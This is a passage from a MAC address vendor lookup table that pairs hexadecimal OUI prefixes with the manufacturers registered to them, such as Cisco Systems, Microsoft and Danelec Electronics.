Ltd. 0011E4 Danelec Electronics A/S 0011E1 Arcelik A.S 00123D GES Co, Ltd 001239 S Net Systems Inc. 001233 JRC TOKKI Co.,Ltd. 001256 LG INFORMATION & COMM. 001246 T.O.M TECHNOLOGY INC.. 00122F Sanei Electric Inc. 001230 Picaso Infocommunication CO., LTD. 0011EF Conitec Datensysteme GmbH 0011EB Innovative Integration 00121D Netfabric Corporation 001214 Koenig & Bauer AG 00120F IEEE 802.3 00120C CE-Infosys Pte Ltd 0011FB Heidelberg Engineering GmbH 0011D6 HandEra, Inc. 0011CA Long Range Systems, Inc. 0011B3 YOSHIMIYA CO.,LTD. 0011B6 Open Systems International 0011B0 Fortelink Inc. 0011AC Simtec Electronics 0011AD Shanghai Ruijie Technology 0011A8 Quest Technologies 001153 Trident Tek, Inc. 00114F US Digital Television, Inc 001182 IMI Norgren Ltd 00117A Singim International Corp. 001172 COTRON CORPORATION 00118F EUTECH INSTRUMENTS PTE. LTD. 00118D Hanchang System Corp. 001191 CTS-Clima Temperatur Systeme GmbH 001189 Aerotech Inc 001168 HomeLogic LLC 001163 SYSTEM SPA DEPT. ELECTRONICS 00115F ITX Security Co., Ltd. 001148 Prolon Control Systems 001140 Nanometrics Inc. 001144 Assurance Technology Corp 00113A SHINBORAM 0011C5 TEN Technology 0011CD Axsun Technologies 0011BE AGP Telecom Co. Ltd 0011BA Elexol Pty Ltd 0011BC Cisco Systems, Inc 00113F Alcatel DI 001137 AICHI ELECTRIC CO., LTD. 001128 Streamit 0011A1 VISION NETWARE CO.,LTD 0011A0 Vtech Engineering Canada Ltd 00119B Telesynergy Research Inc. 000FFF Control4 000FFC Merit Li-Lin Ent. 000FFB Nippon Denso Industry Co., Ltd. 000FF2 Loud Technologies Inc. 000FF1 nex-G Systems Pte.Ltd 000FF3 Jung Myoung Communications&Technology 000FA6 S2 Security Corporation 000FAA Nexus Technologies 000FA8 Photometrics, Inc. 000F9D DisplayLink (UK) Ltd 000FBF DGT Sp. z o.o. 000FBD MRV Communications (Networks) LTD 000FB4 Timespace Technology 000F92 Microhard Systems Inc. 000F89 Winnertec System Co., Ltd. 001101 CET Technologies Pte Ltd 001113 Fraunhofer FOKUS 001112 Honeywell CMSS 000FE0 NComputing Co.,Ltd. 000FE3 Damm Cellular Systems A/S 000FD5 Schwechat - RISE 000FCB 3Com Ltd 000FC5 KeyMed Ltd 000F6E BBox 000F6F FTA Communication Technologies 000F63 Obzerv Technologies 000F65 icube Corp. 000F5D Genexis BV 000F58 Adder Technology Limited 000F09 Private 000EFB Macey Enterprises 000EFA Optoway Technology Incorporation 000EFD FUJINON CORPORATION 000F71 Sanmei Electronics Co.,Ltd 000F6B GateWare Communications GmbH 000F67 West Instruments 000F12 Panasonic Europe Ltd. 000F0E WaveSplitter Technologies, Inc. 000F0C SYNCHRONIC ENGINEERING 000F0B Kentima Technologies AB 000F21 Scientific Atlanta, Inc 000F11 Prodrive B.V. 000F13 Nisca corporation 000F14 Mindray Co., Ltd. 000EF5 iPAC Technology Co., Ltd. 000EDD SHURE INCORPORATED 000EDC Tellion INC. 000ECD SKOV A/S 000ECA WTSS Inc 000ECC Tableau, LLC 000ED5 COPAN Systems Inc. 000EC8 Zoran Corporation 000F46 SINAR AG 000F4D TalkSwitch 000F41 Zipher Ltd 000E37 Harms & Wende GmbH & Co.KG 000E31 Olympus Soft Imaging Solutions GmbH 000E2F Roche Diagnostics GmbH 000E2A Private 000E2C Netcodec co. 000E23 Incipient, Inc. 000E25 Hannae Technology Co., Ltd 000E20 ACCESS Systems Americas, Inc. 000E21 MTU Friedrichshafen GmbH 000EB6 Riverbed Technology, Inc. 000EB7 Knovative, Inc. 000EB1 Newcotech,Ltd 000EB4 GUANGZHOU GAOKE COMMUNICATIONS TECHNOLOGY CO.LTD. 000EA9 Shanghai Xun Shi Communications Equipment Ltd. Co. 000EA3 CNCR-IT CO.,LTD,HangZhou P.R.CHINA 000EA2 McAfee, Inc 000ECB VineSys Technology 000ED2 Filtronic plc 000ED9 Aksys, Ltd. 000EC2 Lowrance Electronics, Inc. 000E63 Lemke Diagnostics GmbH 000E5B ParkerVision - Direct2Data 000E60 360SUN Digital Broadband Corporation 000E54 AlphaCell Wireless Ltd. 000E4E Waveplus Technology Co., Ltd. 000E4A Changchun Huayu WEBPAD Co.,LTD 000E41 NIHON MECHATRONICS CO.,LTD. 000E3C Transact Technologies Inc 000E9B Ambit Microsystems Corporation 000E93 Milénio 3 Sistemas Electrónicos, Lda. 000E8D Systems in Progress Holding GmbH 000E78 Amtelco 000E71 Gemstar Technology Development Ltd. 000E70 in2 Networks 000E76 GEMSOC INNOVISION INC. 000E7D Electronics Line 3000 Ltd. 000DDC VAC 000DE0 ICPDAS Co.,LTD 000DE3 AT Sweden AB 000DD4 Symantec Corporation 000DD2 Simrad Optronics ASA 000D9F RF Micro Devices 000DA5 Fabric7 Systems, Inc 000D99 Orbital Sciences Corp.; Launch Systems Group 000DD1 Stryker Corporation 000DD7 Bright 000DD9 Anton Paar GmbH 000DC9 THALES Elektronik Systeme GmbH 000DC5 EchoStar Global B.V. 000DC8 AirMagnet, Inc 000DBE Bel Fuse Europe Ltd.,UK 000D8F King Tsushin Kogyo Co., LTD. 000D89 Bils Technology Inc 000D86 Huber + Suhner AG 000E02 Advantech AMT Inc. 000DEA Kingtel Telecommunication Corp. 000DED Cisco Systems, Inc 000DE4 DIGINICS, Inc. 000E22 Private 000E1C Hach Company 000E09 Shenzhen Coship Software Co.,LTD. 000E05 WIRELESS MATRIX CORP. 000DBC Cisco Systems, Inc 000D81 Pepperl+Fuchs GmbH 000D7A DiGATTO Asia Pacific Pte Ltd 000D77 FalconStor Software 000D76 Hokuto Denshi Co,. Ltd. 000D7B Consensys Computers Inc. 000D6C M-Audio 000D70 Datamax Corporation 000D31 Compellent Technologies, Inc. 000D2C Net2Edge Limited 000D25 SANDEN CORPORATION 000D24 SENTEC E&E CO., LTD. 000D22 Unitronics LTD 000D14 Vtech Innovation LP dba Advanced American Telephones 000D04 Foxboro Eckardt Development GmbH 000D05 cybernet manufacturing inc. 000D08 AboveCable, Inc. 000CFE Grand Electronic Co., Ltd 000D6F Ember Corporation 000D5E NEC Personal Products 000D5B Smart Empire Investments Limited 000D59 Amity Systems, Inc. 000D17 Turbo Networks Co.Ltd 000D18 Mega-Trend Electronics CO., LTD. 000D20 ASAHIKASEI TECHNOSYSTEM CO.,LTD. 000D0E Inqnet Systems, Inc. 000D11 DENTSPLY - Gendex 000D50 Galazar Networks 000D49 Triton Systems of Delaware, Inc. 000D48 AEWIN Technologies Co., Ltd. 000CE3 Option International N.V. 000CE7 MediaTek Inc. 000CE4 NeuroCom International, Inc. 000CE8 GuangZhou AnJuBao Co., Ltd 000CD0 Symetrix 000CD9 Itcare Co., Ltd 000CD5 Passave Inc. 000CD2 Schaffner EMV AG 000D3F VTI Instruments Corporation 000D3A Microsoft Corp. 000D30 IceFyre Semiconductor 000C65 Sunin Telecom 000C6F Amtek system co.,LTD. 000C6C Eve Systems GmbH 000C58 M&S Systems 000C51 Scientific Technologies Inc. 000CB1 Salland Engineering (Europe) BV 000CBC Iscutum 000CA2 Harmonic Video Network 000CB5 Premier Technolgies, Inc 000CB6 NANJING SEU MOBILE & INTERNET TECHNOLOGY CO.,LTD 000CC3 BeWAN systems 000CB4 AutoCell Laboratories, Inc. 000C73 TELSON ELECTRONICS CO., LTD 000C7E Tellium Incorporated 000C87 AMD 000C83 Logical Solutions 000CCA HGST a Western Digital Company 000A07 WebWayOne Ltd 000CB0 Star Semiconductor Corporation 000C34 Vixen Co., Ltd. 000C98 LETEK Communications Inc. 000C8E Mentor Engineering Inc 000CA4 Prompttec Product Management GmbH 000C96 OQO, Inc. 000BFA EXEMYS SRL 000BF4 Private 000BFB D-NET International Corporation 000BF0 MoTEX Products Co., Ltd. 000BF1 LAP Laser Applikations 000BEE inc.jet, Incorporated 000BE2 Lumenera Corporation 000C08 HUMEX Technologies Corp. 000C0D Communications & Power Industries / Satcom Division 000C04 Tecnova 000BF6 Nitgen Co., Ltd 000C01 Abatron AG 000BFD Cisco Systems, Inc 000C1D Mettler & Fuchs AG 000C13 MediaQ 000C2D FullWave Technology Co., Ltd. 000C26 Weintek Labs. Inc. 000C2B ELIAS Technology, Inc. 000C24 ANATOR 000C1A Quest Technical Solutions Inc. 000C19 Telio Communications GmbH 000BCB Fagor Automation , S. Coop 000BC8 AirFlow Networks 000BCE Free2move AB 000BCF AGFA NDT INC. 000BC3 Multiplex, Inc. 000C39 Sentinel Wireless Inc. 000C32 Avionic Design GmbH 000C33 Compucase Enterprise Co. Ltd. 000C36 S-Takaya Electronics Industry Co.,Ltd. 000C5B HANWANG TECHNOLOGY CO.,LTD 000C60 ACM Systems 000BE1 Nokia NET Product Operations 000BE0 SercoNet Ltd. 000BBE Cisco Systems, Inc 000BBD Connexionz Limited 000BA8 HANBACK ELECTRONICS CO., LTD. 000BA9 CloudShield Technologies, Inc. 000BA1 Fujikura Solutions Ltd. 000BA6 Miyakawa Electric Works Ltd. 000B93 Ritter Elektronik 000B9B Sirius System Co, Ltd. 000B7F Align Engineering LLC 000B85 Cisco Systems, Inc 000B81 Kaparel Corporation 000B82 Grandstream Networks, Inc. 000B6E Neff Instrument Corp. 000B72 Lawo AG 000B42 commax Co., Ltd. 000B47 Advanced Energy 000B3D CONTAL OK Ltd. 000B31 Yantai ZhiYang Scientific and technology industry CO., LTD 000B8E Ascent Corporation 000B8F AKITA ELECTRONICS SYSTEMS CO.,LTD. 000B8D Avvio Networks 000B4E Communications & Power Industries 000B4D Emuzed 000B40 Cambridge Industries Group (CIG) 000B44 Concord Idea Corp. 000B1D LayerZero Power Systems, Inc. 000B19 Vernier Networks, Inc. 000B16 Communication Machinery Corporation 000B12 NURI Telecom Co., Ltd. 000B2F bplan GmbH 000B24 AirLogic 000B78 TAIFATECH INC. 000B6C Sychip Inc. 0091D6 Crystal Group, Inc. 000B5A HyperEdge 000A98 M+F Gwinner GmbH & Co 000A9B TB Group Inc 000A84 Rainsun Enterprise Co., Ltd. 000A7E The Advantage Group 000B0F Bosch Rexroth 000B0C Agile Systems Inc. 000B0A dBm Optics 000B09 Ifoundry Systems Singapore 000AB0 LOYTEC electronics GmbH 000AB5 Digital Electronic Network 000AA5 MAXLINK INDUSTRIES LIMITED 000AA9 Brooks Automation GmbH 000AD2 JEPICO Corporation 000AC5 Color Kinetics 000ABD Rupprecht & Patashnick Co. 000AA2 SYSTEK INC. 000A91 HemoCue AB 000AFE NovaPal Ltd 000AFD Kentec Electronics 000AEF OTRUM ASA 000A78 OLITEC 000A7B Cornelius Consult 000ACB XPAK MSA Group 000AD5 Brainchild Electronic Co., Ltd. 000AD6 BeamReach Networks 000AE5 ScottCare Corporation 000A4D Noritz Corporation 000A3A J-THREE INTERNATIONAL Holding Co., Ltd. 000A47 Allied Vision Technologies 000A44 Avery Dennison Deutschland GmbH 000A3C Enerpoint Ltd. 000A40 Crown Audio -- Harmanm International 000A73 Scientific Atlanta 000A69 SUNNY bell Technology Co., Ltd. 000A6C Walchem Corporation 000A6B Tadiran Telecom Business Systems LTD 000A5F almedio inc. 000A61 Cellinx Systems Inc. 0009FE Daisy Technologies, Inc. 0009EB HuMANDATA LTD. 0009E8 Cisco Systems, Inc 0009E9 Cisco Systems, Inc 0009ED CipherOptics 0009F2 Cohu, Inc., Electronics Division 000A26 CEIA S.p.A. 000A29 Pan Dacom Networking AG 000A1D Optical Communications Products Inc. 000A16 Lassen Research 000A18 Vichel Inc. 000A06 Teledex LLC 000A0D Amphenol 0009F8 UNIMO TECHNOLOGY CO., LTD. 0009FF X.net 2000 GmbH 000A03 ENDESA SERVICIOS, S.L. 000A5B Power-One as 000A55 MARKEM Corporation 000A4C Molecular Devices Corporation 000A28 Motorola 0009DC Galaxis Technology AG 0009DD Mavin Technology Inc. 0009C6 Visionics Corporation 0009D1 SERANOA NETWORKS INC 0009CE SpaceBridge Semiconductor Corp. 00096B IBM Corp 00096D Powernet Technologies Corp. 000964 Hi-Techniques, Inc. 000965 HyunJu Computer Co., Ltd. 00096F Beijing Zhongqing Elegant Tech. Corp.,Limited 00095E Masstech Group Inc. 0009A9 Ikanos Communications 00099F VIDEX INC. 0009A2 Interface Co., Ltd. 0009A1 Telewise Communications, Inc. 00097D SecWell Networks Oy 000976 Datasoft ISDN Systems GmbH 00097A Louis Design Labs. 0009BD Epygi Technologies, Ltd. 0009C2 Onity, Inc. 0009C3 NETAS 0009B5 3J Tech. Co., Ltd. 0009B8 Entise Systems 0009AF e-generis 0009AD HYUNDAI SYSCOMM, INC. 000982 Loewe Opta GmbH 000983 GlobalTop Technology, Inc. 000959 Sitecsoft 000957 Supercaller, Inc. 00094F elmegt GmbH & Co. KG 000943 Cisco Systems, Inc 000939 ShibaSoku Co.,Ltd. 000933 Ophit Co.Ltd. 000932 Omnilux 000929 Sanyo Industries (UK) Limited 000928 Telecore 0008C5 Liontech Co., Ltd. 0008CA TwinHan Technology Co.,Ltd 0008B6 RouteFree, Inc. 000885 EMS Dr. Thomas Wünsche 000872 Sorenson Communications 00087C Cisco Systems, Inc 000879 CEM Corporation 00087D Cisco Systems, Inc 000875 Acorp Electronics Corp. 00086F Resources Computer Network Ltd. 00091C CacheVision, Inc 00091A Macat Optics & Electronics Co., Ltd. 00091B Digital Generation Inc. 0008B0 HUBER+SUHNER BKtel GmbH 0008AC BST GmbH 0008AA KARAM 0008AB EnerLinx.com, Inc. 0008AD Toyo-Linx Co., Ltd. 00089A Alcatel Microelectronics 0008A1 CNet Technology Inc. 000893 LE INFORMATION COMMUNICATION INC. 000888 OULLIM Information Technology Inc,. 0008DF Alistel Inc. 0008DB Corrigent Systems 0008D8 Dowkey Microwave 0008F2 C&S Technology 0008EA Motion Control Engineering, Inc 0008ED ST&T Instrument Corp. 000902 Redline Communications Inc. 0008FA KEB Automation KG 0008D2 ZOOM Networks Inc. 0007AE Britestream Networks, Inc. 0007B1 Equator Technologies 0007A7 A-Z Inc. 0007A6 Leviton Manufacturing Co., Inc. 0007A3 Ositis Software, Inc. 0007F8 ITDevices, Inc. 0007F3 Thinkengine Networks 0007EE telco Informationssysteme GmbH 0007E2 Bitworks, Inc. 0007E6 edgeflow Canada Inc. 0005F9 TOA Corporation 0007CA Creatix Polymedia Ges Fur Kommunikaitonssysteme 0007C5 Gcom, Inc. 0007C8 Brain21, Inc. 000826 Colorado Med Tech 00081C @pos.com 000816 Bluelon ApS 0007C1 Overture Networks, Inc. 0007C2 Netsys Telecom 000811 VOIX Corporation 000806 Raonet Systems, Inc. 0007E5 Coup Corporation 0007DE eCopilt AB 0007DF Vbrick Systems Inc. 000867 Uptime Devices 00085E PCO AG 000856 Gamatronic Electronic Industries Ltd. 000853 Schleicher GmbH & Co. Relaiswerke KG 000752 Rhythm Watch Co., Ltd. 00074F Cisco Systems, Inc 000743 Chelsio Communications 000747 Mecalc 000744 Unico, Inc. 000749 CENiX Inc. 00073D Nanjing Postel Telecommunications Co., Ltd. 000739 Scotty Group Austria Gmbh 000707 Interalia Inc. 0006F0 Digeo, Inc. 000700 Zettamedia Korea 0006F2 Platys Communications 0006FA IP SQUARE Co, Ltd. 000703 CSEE Transport 000706 Sanritz Corporation 0006EF Maxxan Systems, Inc. 0006E9 Intime Corp. 0006EA ELZET80 Mikrocomputer GmbH&Co. KG 00071F European Systems Integration 000721 Formac Elektronik GmbH 000708 Bitrage Inc. 000712 JAL Information Technology 000713 IP One, Inc. 00075E Ametek Power Instruments 000760 TOMIS Information & Telecom Corp. 00074E IPFRONT Inc 00079A Verint Systems Inc 000774 GuangZhou Thinker Technology Co. Ltd. 000798 Selea SRL 000791 International Data Communications, Inc. 000735 Flarion Technologies, Inc. 000730 Hutchison OPTEL Telecom Technology Co., Ltd. 000722 The Nielsen Company 00078F Emkay Innovative Products 000782 Oracle Corporation 000786 Wireless Networks Inc. 000779 Sungil Telecom Co., Ltd. 00077E Elrest GmbH 000778 GERSTEL GmbH & Co. KG 00076D Flexlight Networks 0006C5 INNOVI Technologies Limited 0006C6 lesswire AG 0006B7 TELEM GmbH 0006BC Macrolink, Inc. 0006C2 Smartmatic Corporation 000654 Winpresa Building Automation Technologies GmbH 0006B4 Vorne Industries, Inc. 0006AE Himachal Futuristic Communications Ltd 00068A NeuronNet Co. Ltd. R&D Center 000685 NetNearU Corporation 00067F Digeo, Inc. 000683 Bravara Communications, Inc. 000655 Yipee, Inc. 0006E5 Fujian Newland Computer Ltd. Co. 0006DE Flash Technology 0006DF AIDONIC Corporation 0006DD AT & T Laboratories - Cambridge Ltd 0006D1 Tahoe Networks, Inc. 0006D4 Interactive Objects, Inc. 000644 NextGen Business Solutions, Inc 000645 Meisei Electric Co. Ltd. 000640 White Rock Networks 00063A Dura Micro, Inc. 00067A JMP Systems 000673 TKH Security Solutions USA 000676 Novra Technologies Inc. 000664 Fostex Corporation 00069B AVT Audio Video Technologies GmbH 000693 Flexus Computer Technology, Inc. 000696 Advent Networks 00068E HID Corporation 0006CA American Computer & Digital Components, Inc. (ACDC) 0006CE DATENO 00065D Heidelberg Web Systems 000650 Tiburon Networks, Inc. 00065E Photuris, Inc. 0006B0 Comtech EF Data Corp. 0005D7 Vista Imaging, Inc. 0005DB PSI Nentec GmbH 0005DD Cisco Systems, Inc 0005D9 Techno Valley, Inc. 0005C3 Pacific Instruments, Inc. 0005B9 Airvana, Inc. 0005BC Resource Data Management Ltd 0005BE Kongsberg Seatex AS 0005BD ROAX BV 0005C1 A-Kyung Motion, Inc. 0005B6 INSYS Microelectronics GmbH 0005E8 TurboWave, Inc. 0005F6 Young Chang Co. Ltd. 0005FC Schenck Pegasus Corp. A06A00 Verilink Corporation 0005F8 Real Time Access, Inc. 0005EB Blue Ridge Networks, Inc. 000632 Mesco Engineering GmbH 000634 GTE Airfone Inc. 000628 Cisco Systems, Inc 0005B4 Aceex Corporation 000598 CRONOS S.r.l. 0005B7 Arbor Technology Corp. 00059B Cisco Systems, Inc 00059F Yotta Networks, Inc. 00061D MIP Telecom, Inc. 000619 Connection Technology Systems 00060C Melco Industries, Inc. 00060E IGYS Systems, Inc. 000614 Prism Holdings 000608 At-Sky SAS 000587 Locus, Incorporated 000590 Swissvoice Ltd. 000595 Alesis Corporation 0005DC Cisco Systems, Inc 0005D0 Solinet Systems 000555 Japan Cash Machine Co., Ltd. 000552 Xycotec Computer GmbH 00054A Ario Data Networks, Inc. 000548 Disco Corporation 00053E KID Systeme GmbH 00053F VisionTek, Inc. 00057E Eckelmann Steuerungstechnik GmbH 000580 FibroLAN Ltd. 000582 ClearCube Technology 000578 Private 000572 Deonet Co., Ltd. 000576 NSM Technology Ltd. 0004DA Relax Technology, Inc. 0004E5 Glonet Systems, Inc. 0004D2 Adcon Telemetry GmbH 0004FD Japan Control Engineering Co., Ltd. 0004F7 Omega Band, Inc. 0004EE Lincoln Electric Company 0004F0 International Computers, Ltd 00050D Midstream Technologies, Inc. 000500 Cisco Systems, Inc 000507 Fine Appliance Corp. 0004D3 Toyokeiki Co., Ltd. 0004D5 Hitachi Information & Communication Engineering, Ltd. 0004CA FreeMs Corp. 000529 Shanghai Broadan Communication Technology Co., Ltd 00052C Supreme Magic Corporation 000519 Siemens Building Technologies AG, 00053D Agere Systems 000535 Chip PC Ltd. 000527 SJ Tek Co. Ltd 00056A Heuft Systemtechnik GmbH 000568 Piltofish Networks AB 000562 Digital View Limited 0004A0 Verity Instruments, Inc. 00049E Wirelink Co., Ltd. 00049A Cisco Systems, Inc 000498 Mahi Networks 000497 MacroSystem Digital Video AG 000488 Eurotherm Controls 000455 ANTARA.net 000457 Universal Access Technology, Inc. 0004C5 ASE Technologies, USA 0004B0 ELESIGN Co., Ltd. 0004AB Mavenir Inc. 0004A7 FabiaTech Corporation 0004AA Jetstream Communications 000414 Umezawa Musen Denki Co., Ltd. 00040C Kanno Works, Ltd. 000408 Sanko Electronics Co., Ltd. 000409 Cratos Networks 000407 Topcon Positioning Systems, Inc. 000447 Acrowave Systems Co., Ltd. 00043E Telencomm 000436 ELANsat Technologies, Inc. 000432 Voyetra Turtle Beach, Inc. 000485 PicoLight 000479 Radius Co., Ltd. 000435 InfiNet LLC 000437 Powin Information Technology, Inc. 000428 Cisco Systems, Inc 00044D Cisco Systems, Inc 000454 Quadriga UK 000448 Polaroid Corporation 00046D Cisco Systems, Inc 000466 ARMITEL Co. 0003D7 NextNet Wireless, Inc. 0003D3 Internet Energy Systems, Inc. 0003CD Clovertech, Inc. 0003CC Momentum Computer, Inc. 00038B PLUS-ONE I&T, Inc. 00038C Total Impact 000386 Ho Net, Inc. 00037D Stellcom 000383 Metera Networks, Inc. 000362 Vodtel Communications, Inc. 000364 Scenix Semiconductor, Inc. 00035E Metropolitan Area Networks, Inc. 00035C Saint Song Corp. 00035D Bosung Hi-Net Co., Ltd. 000379 Proscend Communications, Inc. 00036F Telsey SPA 000372 ULAN 000366 ASM Pacific Technology 0003EE MKNet Corporation 0003EA Mega System Technologies, Inc. 0003E6 Entone, Inc. 00039F Cisco Systems, Inc 000390 Digital Video Communications, Inc. 0003B5 Entra Technology Co. 0003A9 AXCENT Media AG 0003E2 Comspace Corporation 0003FF Microsoft Corporation 0002D9 Reliable Controls 0002D2 Workstation AG 0002CD TeleDream, Inc. 0002D0 Comdial Corporation 00029D Merix Corp. 000290 Woorigisool, Inc. 000292 Logic Innovations, Inc. 000286 Occam Networks 00034D Chiaro Networks, Ltd. 000341 Axon Digital Design 008037 Ericsson Group 00033D ILSHin Lab 000334 Omega Engineering Inc. 00033A Silicon Wave, Inc. 000332 Cisco Systems, Inc 0002B4 DAPHNE 0002B0 Hokubu Communication & Industrial Co., Ltd. 0002AA PLcom Co., Ltd. 0002CC M.C.C.I 0002C5 Evertz Microsystems Ltd. 0002B5 Avnet, Inc. 0002F2 eDevice, Inc. 0002EF CCC Network Systems Group Ltd. 0002E8 E.D.&A. 00030E Core Communications Co., Ltd. 000312 TRsystems GmbH 000326 Iwasaki Information Systems Co., Ltd. 000322 IDIS Co., Ltd. 00031D Taiwan Commate Computer, Inc. 00025D Calix Networks 000257 Microcom Corp. 000253 Televideo, Inc. 00024A Cisco Systems, Inc 000249 Aviv Infocom Co, Ltd. 000245 Lampus Co, Ltd. 000246 All-Win Tech Co., Ltd. 00023A ZSK Stickmaschinen GmbH 000273 Coriolis Networks 00026F Senao International Co., Ltd. 000232 Avision, Inc. 000235 Paragon Networks International 000237 Cosmo Research Corp. 000228 Necsom, Ltd. 000230 Intersoft Electronics 00021C Network Elements, Inc. 00020C Metro-Optix 000216 Cisco Systems, Inc 00027E Cisco Systems, Inc 00027F ask-technologies.com 001095 Thomson Inc. 00027B Amplify Net, Inc. 0001F6 Association of Musical Electronics Industry 0001ED SETA Corp. 0001EA Cirilium Corp. 000214 DTVRO 00020F AATR 0001E0 Fast Systems, Inc. 0001D6 manroland AG 00013A SHELCAD COMMUNICATIONS, LTD. 000140 Sendtek Corporation 000123 Schneider Electric Japan Holdings Ltd. 000125 YAESU MUSEN CO., LTD. 000126 PAC Labs 00011B Unizone Technologies, Inc. 00011D Centillium Communications 00015A Digital Video Broadcasting 000159 S1 Corporation 00012A Telematica Sistems Inteligente 00012D Komodo Technology 000148 X-traWeb Inc. 0001AC Sitara Networks, Inc. 0001AD Coach Master International d.b.a. CMI Worldwide, Inc. 00019B Kyoto Microcomputer Co., Ltd. 000188 LXCO Technologies ag 000166 TC GROUP A/S 000171 Allied Data Technologies 000176 Orient Silver Enterprises 000158 Electro Industries/Gauge Tech 00011F RC Networks, Inc. 000197 Cisco Systems, Inc 000180 AOpen, Inc. 0030AC Systeme Lauer GmbH & Co., Ltd. 00017F Experience Music Project 000187 I2SE GmbH 00019A LEUNIG GmbH 0001CB EVR 0001C3 Acromag, Inc. 0001C2 ARK Research Corp. 00B09A Morrow Technologies Corp. 0030A9 Netiverse, Inc. 0030FE DSA GmbH 0030C4 Canon Imaging Systems Inc. 00304D ESI 00302E Hoft & Wessel AG 0030ED Expert Magnetics Corp. 00300F IMT - Information Management T 003082 TAIHAN ELECTRIC WIRE CO., LTD. 0030FB AZS Technology AG 003003 Phasys Ltd. 0030AE Times N System, Inc. 0030E2 GARNET SYSTEMS CO., LTD. 00B080 Mannesmann Ipulsys B.V. 00B01E Rantic Labs, Inc. 00B0F0 CALY NETWORKS 0030D5 DResearch GmbH 003018 Jetway Information Co., Ltd. 003089 Spectrapoint Wireless, LLC 0030A7 SCHWEITZER ENGINEERING 003023 COGENT COMPUTER SYSTEMS, INC. 003090 CYRA TECHNOLOGIES, INC. 00307C ADID SA 003055 Renesas Technology America, Inc. 00302F GE Aviation System 00300E Klotz Digital AG 0030BB CacheFlow, Inc. 00309A ASTRO TERRA CORP. 00309F AMBER NETWORKS 0030A8 OL'E COMMUNICATIONS, INC. 0030D1 INOVA CORPORATION 081443 UNIBRAIN S.A. 00B009 Grass Valley, A Belden Brand 00B0AC SIAE-Microelettronica S.p.A. 003087 VEGA GRIESHABER KG 0030AA AXUS MICROSYSTEMS, INC. 0030E6 Draeger Medical Systems, Inc. 003062 IP Video Networks Inc 00302D QUANTUM BRIDGE COMMUNICATIONS 0030CB OMNI FLOW COMPUTERS, INC. 00306B CMOS SYSTEMS, INC. 0030AD SHANGHAI COMMUNICATION 00D085 OTIS ELEVATOR COMPANY 00D0E9 Advantage Century Telecommunication Corp. 00D094 Seeion Control LLC 00D0CF MORETON BAY 00D07F STRATEGY & TECHNOLOGY, LIMITED 003036 RMP ELEKTRONIKSYSTEME GMBH 00D0F5 ORANGE MICRO, INC. 00D078 Eltex of Sweden AB 00D0C2 BALTHAZAR TECHNOLOGY AB 00D022 INCREDIBLE TECHNOLOGIES, INC. 0030CF TWO TECHNOLOGIES, INC. 0030B2 L-3 Sonoma EO 003035 Corning Incorporated 00307F IRLAN LTD. 00D015 UNIVEX MICROTECHNOLOGY CORP. 00D0A5 AMERICAN ARIUM 00D048 ECTON, INC. 00305D DIGITRA SYSTEMS, INC. 00D069 TECHNOLOGIC SYSTEMS 00D090 Cisco Systems, Inc 003007 OPTI, INC. 0030BD BELKIN COMPONENTS 00D067 CAMPIO COMMUNICATIONS 00D058 Cisco Systems, Inc 00D032 YANO ELECTRIC CO., LTD. 00D0F1 SEGA ENTERPRISES, LTD. 00D03D GALILEO TECHNOLOGY, LTD. 00D041 AMIGO TECHNOLOGY CO., LTD. 00D02B JETCELL, INC. 00D03A ZONEWORX, INC. 00D001 VST TECHNOLOGIES, INC. 00503E Cisco Systems, Inc 005020 MEDIASTAR CO., LTD. 00D075 ALARIS MEDICAL SYSTEMS, INC. 00D00B RHK TECHNOLOGY, INC. 00D0A0 MIPS DENMARK 00D00A LANACCESS TELECOM S.A. 00D01C SBS TECHNOLOGIES, 00D0D5 GRUNDIG AG 00D06D ACRISON, INC. 00D071 ECHELON CORP. 00D04F BITRONICS, INC. 00D0FB TEK MICROSYSTEMS, INCORPORATED 00D066 WINTRISS ENGINEERING CORP. 00D082 IOWAVE INC. 00D09D VERIS INDUSTRIES 00D04C Eseye Design Ltd 00D0E1 AVIONITEK ISRAEL INC. 00D008 MACTELL CORPORATION 00D0D9 DEDICATED MICROCOMPUTERS 00D09C KAPADIA COMMUNICATIONS 00D0F3 SOLARI DI UDINE SPA 00D039 UTILICOM, INC. 00D081 RTD Embedded Technologies, Inc. 00D002 DITECH CORPORATION 00D09B SPECTEL LTD. 00D011 PRISM VIDEO, INC. 00D0DF KUZUMI ELECTRONICS, INC. 00D062 DIGIGRAM 00D08D PHOENIX GROUP, INC. 00505E DIGITEK MICROLOGIC S.A. 005090 DCTRI 00503B MEDIAFIRE CORPORATION 005046 MENICX INTERNATIONAL CO., LTD. 005041 Coretronic Corporation 0050B0 TECHNOLOGY ATLANTA CORPORATION 0050DD SERRA SOLDADURA, S.A. 005067 AEROCOMM, INC. 0050B6 GOOD WAY IND. CO., LTD. 00504B BARCONET N.V. 0050D9 ENGETRON-ENGENHARIA ELETRONICA IND. e COM. LTDA 005063 OY COMSEL SYSTEM AB 00508D ABIT COMPUTER CORPORATION 0050A0 DELTA COMPUTER SYSTEMS, INC. 005086 TELKOM SA, LTD. 00501A IQinVision 00508F ASITA TECHNOLOGIES INT'L LTD. 005015 BRIGHT STAR ENGINEERING 005057 BROADBAND ACCESS SYSTEMS 005088 AMANO CORPORATION 005031 AEROFLEX LABORATORIES, INC. 0050C6 LOOP TELECOMMUNICATION INTERNATIONAL, INC. 00509F HORIZON COMPUTER 0050A5 CAPITOL BUSINESS SYSTEMS, LTD. 005000 NEXO COMMUNICATIONS, INC. 0050C8 Addonics Technologies, Inc. 005089 SAFETY MANAGEMENT SYSTEMS 005066 AtecoM GmbH advanced telecomunication modules 005059 iBAHN 0050E7 PARADISE INNOVATIONS (ASIA) 0050FB VSK ELECTRONICS 0050F4 SIGMATEK GMBH & CO. KG 005021 EIS INTERNATIONAL, INC. 0050E8 Nomadix, Inc 0050EA XEL COMMUNICATIONS, INC. 0050AE FDK Co., Ltd 005003 Xrite Inc 0050D3 DIGITAL AUDIO PROCESSING PTY. LTD. 0050AF INTERGON, INC. 0050AD CommUnique Wireless Corp. 00907B E-TECH, INC. 009081 ALOHA NETWORKS, INC. 00901C mps Software Gmbh 0090DB NEXT LEVEL COMMUNICATIONS 009056 TELESTREAM, INC. 009068 DVT CORP. 0090EB SENTRY TELECOM SYSTEMS 0090FE ELECOM CO., LTD. (LANEED DIV.) 009059 TELECOM DEVICE K.K. 0090CA ACCORD VIDEO TELECOMMUNICATIONS, LTD. 0090E9 JANZ COMPUTER AG 009037 ACUCOMM, INC. 009078 MER TELEMANAGEMENT SOLUTIONS, LTD. 0090B5 NIKON CORPORATION 009005 